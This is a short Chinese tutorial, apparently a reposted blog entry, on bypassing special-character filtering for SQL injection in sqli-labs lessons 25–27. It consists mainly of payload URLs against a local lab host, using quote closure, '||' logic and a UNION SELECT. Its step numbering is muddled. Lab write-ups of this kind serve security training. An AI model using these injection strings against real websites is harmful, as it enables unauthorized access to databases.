本篇文章给大家分享的是有关如何绕过去除特殊字符进行sql注入，小编觉得挺实用的，因此分享给大家学习，希望大家阅读完这篇文章后可以有所收获，话不多说，跟着小编一起来看看吧。

环境sqli-labs

less 25

1、输入特殊字符，报错

http://192.168.1.121/sqli/Less-25/?id=1\

2、单引号闭合

http://192.168.1.121/sqli/Less-25/?id=1' || 1=1 --+

二、闭合语句没有效果，屏蔽了-，空格，or等等

http://192.168.1.121/sqli/Less-26/?id=1' --+

三、重新构造闭合语句

http://192.168.1.121/sqli/Less-26/?id=1' ||'a'='a

less 27

一、输入特殊字符，报错

http://192.168.1.121/sqli/Less-27/?id=1'

三、通过union查询

http://192.168.1.121/sqli/Less-27/?id=1' union select 1,2,3 ||'1

以上就是如何绕过去除特殊字符进行sql注入，小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注天达云行业资讯频道。